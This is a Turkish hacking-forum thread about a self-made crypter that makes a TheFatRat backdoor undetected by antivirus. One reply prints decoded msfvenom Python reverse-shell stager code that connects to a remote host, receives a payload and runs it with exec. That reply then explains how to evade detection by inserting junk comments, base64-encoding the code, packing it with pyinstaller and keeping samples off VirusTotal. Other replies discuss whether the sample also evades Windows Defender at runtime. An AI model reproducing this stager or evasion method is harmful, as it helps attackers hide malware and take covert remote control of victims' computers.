Metasploit Exploit Crypter [0/26] V.I.P

26 Kas 2020
207
17
Söğüt
Merhaba,
Kali Linux'de TheFatRat ile oluşturulan .bat arka kapı virüsü 6/26 çıkıyor normalde,
ben de kendi kod bilgimle bi crypter yaptım ve sonuç 0/26 çıktı + sorunsuz çalışıyor. Client'de herhangi bir bozulma yok!

lrpj7uw.PNG


Crypter testi:

kafanıza takılan soruları buradan sorabilirsiniz veya p.m ye​
 

Pelacanus

İstihbarat Tim Asistanı
28 Haz 2020
318
60
Thefatrat sürekli güncelleme aldıgı ıcın oldukca iyi bir araç. fudlamak aslında okadarda zor degil eger programlama dili biliyorsan... Fudlama işlemleri genellikle sağ kulağını sağ elinle değilde sol elinle tutmak gibidir. Eğer bir virusu fudlamak istiyorsan antivirus programlarının nasıl çalıstıgını bilmek gerekir. Antiviruslerin databasesinde örnek vermek gerekirse a harfi oldugunu düşünün siz a harfini A şeklinde yazarsanız aynı işleme sahip olacak fakat antivirus programları bunu goremeyecek. Bir örnek daha verelim mesela msfvenom yardımıyla python payload olusturalım oluşturdugun payloadı actıgında base64 ile sifrelenmiş olacagını goreceksiniz. Bu şifreyi decode edip kodlara baktıgımızda soyle gozukecektir.

import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('192.168.0.1',3333))
l=struct.unpack('>I',s.recv(4))0
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})

biz bu kodların arasına not amaçlı kelimeler bırakalım

#True
import socket,struct
#DANK
s=socket.socket(2,socket.SOCK_STREAM)
#WOW
s.connect(('192.168.0.1',3333))
#YOU HAD ONE JOB
l=struct.unpack('>I',s.recv(4))0
#NICE AV
d=s.recv(l)
#LOL NEVER MIND
while len(d)<l:
d+=s.recv(l-len(d))
#WHOA
exec(d,{'s':s})

daha sonra base64 ile encode edip txt üzerine kopyalayıp .py uzantılı kaydedelim.

şimdi geldi işin exe tarafına.. Bunu yapabilmek için py2exe veya pyinstaller araçlarına ihtiyacımız var. Kurulumunu vs anlatmıyorum. Gözlemlediğim kadarıyla py2exe ile yaptıgım payloadı 2 antivirus yakalarken, pyinstaller ile yaptıgımı 0 antivirus yakaladı. Deneme yapmak lazım bazen. Bunu yaklasık 1 sene once yaptım. Gayet başarılı calışıyordu fakat gecenlerde denediğimde 6 adet antivirus yakaladı. Bilgisiz arkadaşlarımız virustotal gibi sitelere yukledikleri için artık kullanılamaz hale geliyor. E tabi ne demiştik sağ kulağımızı sol elden tutmak gerekir bazen. Python bilgisi olan arkadaşlar aynı işlevi farklı kodlar ile yazarsa yine %100 fud olacaktır. İyi forumlar
 

PS1K0

Uzman üye
6 Ağu 2015
1,101
0
[email protected]
Peki bu sonuçların hepsi Runtime olarakmı yoksa sadece Scantime mı? yani Defenderi açık olan bir bilgisayarda sorunsuz çalışıp bağlantı alabiliyormusun?
 

Whisperingofficial

Yeni üye
2 Eyl 2021
7
3
18
Merhaba,
Kali Linux'de TheFatRat ile oluşturulan .bat arka kapı virüsü 6/26 çıkıyor normalde,
ben de kendi kod bilgimle bi crypter yaptım ve sonuç 0/26 çıktı + sorunsuz çalışıyor. Client'de herhangi bir bozulma yok!

lrpj7uw.PNG


Crypter testi:

kafanıza takılan soruları buradan sorabilirsiniz veya p.m ye​
insanlar virüs totale daha çok güveniyor onuda ss atsana bence onuda full clean yaparsın
 

THT SON MESAJLAR

Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.